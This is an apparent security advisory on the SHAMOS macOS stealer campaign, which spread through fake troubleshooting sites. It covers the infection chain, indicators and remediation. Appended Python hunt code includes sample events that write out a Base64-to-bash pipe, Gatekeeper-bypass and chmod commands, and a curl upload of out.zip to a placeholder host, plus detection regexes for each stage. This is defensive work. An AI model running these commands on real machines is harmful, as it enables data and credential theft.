Severity
High
Analysis Summary
Between June and August 2025, a sophisticated malware campaign emerged targeting macOS users worldwide, compromising more than 300 customer environments through deceptive help websites. The operation involves SHAMOS, a new variant of the well-known Atomic macOS Stealer (AMOS), operated by the cybercriminal group COOKIE SPIDER, who distribute it as a malware-as-a-service offering. Victims are lured while searching for common macOS troubleshooting queries, such as “macos flush resolver cache,” and are redirected to malvertising websites like mac-safer.com and rescue-mac.com, which pose as legitimate technical support resources. Notably, the campaign has targeted users in the U.S., U.K., Japan, China, Colombia, Canada, Mexico, and Italy, but deliberately avoids Russia due to restrictions in eCrime forums that prohibit targeting CIS regions.
The attack leverages advanced social engineering, presenting users with seemingly helpful troubleshooting instructions. However, these steps include a malicious one-line terminal command that initiates the infection process. This command decodes a Base64 string to retrieve a malicious URL hosted at icloudservers.com, which serves a Bash installation script. Once executed, the script captures the user’s password and downloads the SHAMOS Mach-O executable, placing it into the /tmp/ directory. Researchers noted that at least one Google Advertising profile used for promoting the spoofed sites impersonated a legitimate Australian electronics store, showing the actor’s use of identity spoofing and paid advertising to maximize reach and credibility.
From a technical standpoint, SHAMOS employs multiple evasion techniques to bypass macOS defenses. It removes extended file attributes with xattr commands to disable Gatekeeper checks, assigns execution rights via chmod, and runs anti-virtual machine checks to avoid detection in sandbox environments. The malware also uses AppleScript commands to conduct extensive system reconnaissance and data collection. Its primary targets include cryptocurrency wallet files, browser-stored credentials, Apple Keychain data, Apple Notes, and other sensitive databases, making it a comprehensive information stealer. All collected data is packaged into a file named out.zip and exfiltrated to remote servers via curl commands.
To ensure persistence, SHAMOS leverages sudo privileges when available and installs a malicious Plist file (com.finder.helper.plist) in the User’s LaunchDaemons directory. This allows the malware to automatically relaunch upon system reboot, ensuring long-term access and repeated data theft. Overall, this campaign demonstrates a dangerous evolution in malvertising-based distribution and macOS-targeted malware, combining social engineering, identity spoofing, and technical sophistication to bypass user trust and platform defenses, highlighting the growing threat landscape for Apple users who have traditionally been considered safer from large-scale malware operations.
Impact
- Sensitive Data Theft
- Gain Access
- Security Bypass
Indicators of Compromise
Domain Name
- mac-safer.com
- rescue-mac.com
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Block malicious domains and IPs linked to the campaign, including icloudservers.com, mac-safer.com, and rescue-mac.com.
- Disable or restrict execution of unknown one-line shell commands from unverified sources.
- Educate users not to copy-paste commands from random websites.
- Harden Gatekeeper and XProtect policies by ensuring they are enabled and regularly updated.
- Monitor for suspicious use of curl, bash, xattr, and chmod commands in endpoint logs, as these are key parts of the infection chain.
- Deploy endpoint detection and response (EDR) tools that can identify AppleScript abuse, anti-VM checks, and anomalous persistence attempts.
- Audit the LaunchDaemons directory (/Library/LaunchDaemons/) for suspicious plist files such as com.finder.helper.plist.
- Implement browser ad-blocking and safe-browsing extensions to help prevent malvertising-driven redirections.
- Raise user awareness about malvertising campaigns and fake troubleshooting websites that request terminal command execution.
- Use network monitoring to detect suspicious outbound connections or exfiltration attempts via curl uploads (e.g., ZIP archives like out.zip).
- Regularly back up critical data and secure cryptocurrency wallets, browser-stored credentials, and Keychain data to limit the impact of theft.
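The infection chain described in the analysis (Base64-decoded command piped to a shell, xattr and chmod on a /tmp binary, curl upload of out.zip) and the LaunchDaemons audit in the remediation list can be turned into simple hunt logic. The following is an added example, not code from the advisory or its authors: the process-event lines and plists are constructed samples, and the `user|process|cmdline` field layout is an assumption about the telemetry format.

```python
import plistlib
import re

# Constructed sample process events (not real telemetry), one per line: "user|process|cmdline"
SAMPLE_EVENTS = [
    "alice|bash|echo aGVsbG8= | base64 -d | bash",
    "alice|xattr|xattr -c /tmp/update",
    "alice|chmod|chmod +x /tmp/update",
    "alice|curl|curl -F file=@/tmp/out.zip http://example.invalid/upload",
    "alice|ls|ls -la /tmp",
]

# One regex per stage of the chain reported in the advisory, matched against the command line.
STAGES = {
    "base64_to_shell": re.compile(r"base64\s+(-d|--decode).*\|\s*(ba)?sh\b"),
    "gatekeeper_bypass": re.compile(r"\bxattr\s+(-c|-d\s+com\.apple\.quarantine)\b"),
    "tmp_exec_rights": re.compile(r"\bchmod\s+\+x\s+/tmp/"),
    "curl_exfil_zip": re.compile(r"\bcurl\b.*(-F|--upload-file|-T|--data-binary).*\.zip\b"),
}

# Constructed plists: one shaped like the reported persistence item, one benign control.
SAMPLE_PLIST = plistlib.dumps(
    {"Label": "com.finder.helper", "ProgramArguments": ["/tmp/update"], "RunAtLoad": True}
)
BENIGN_PLIST = plistlib.dumps({"Label": "com.example.agent", "Program": "/usr/libexec/agent"})

def classify_events(lines):
    """Return (stage, line) pairs for every event whose command line matches a chain stage."""
    hits = []
    for line in lines:
        _user, _proc, cmdline = line.split("|", 2)
        for stage, pattern in STAGES.items():
            if pattern.search(cmdline):
                hits.append((stage, line))
    return hits

def audit_launchdaemon(plist_bytes):
    """Return the reasons a LaunchDaemon plist looks like the advisory's persistence pattern.

    An empty list means nothing matched. The /tmp and home-directory checks are heuristics;
    the label check uses the exact name reported in the advisory."""
    data = plistlib.loads(plist_bytes)
    args = data.get("ProgramArguments") or [data.get("Program", "")]
    reasons = []
    if data.get("Label") == "com.finder.helper":
        reasons.append("known malicious label")
    if any(a.startswith(("/tmp/", "/private/tmp/")) for a in args):
        reasons.append("program runs from /tmp")
    if data.get("RunAtLoad") and any(a.startswith("/Users/") for a in args):
        reasons.append("RunAtLoad daemon points into a user home directory")
    return reasons
```

Feed `classify_events` the command-line field of your EDR or unified-log export and `audit_launchdaemon` the bytes of each file under /Library/LaunchDaemons/; a single host showing all four stages in order is a strong signal rather than a set of isolated alerts.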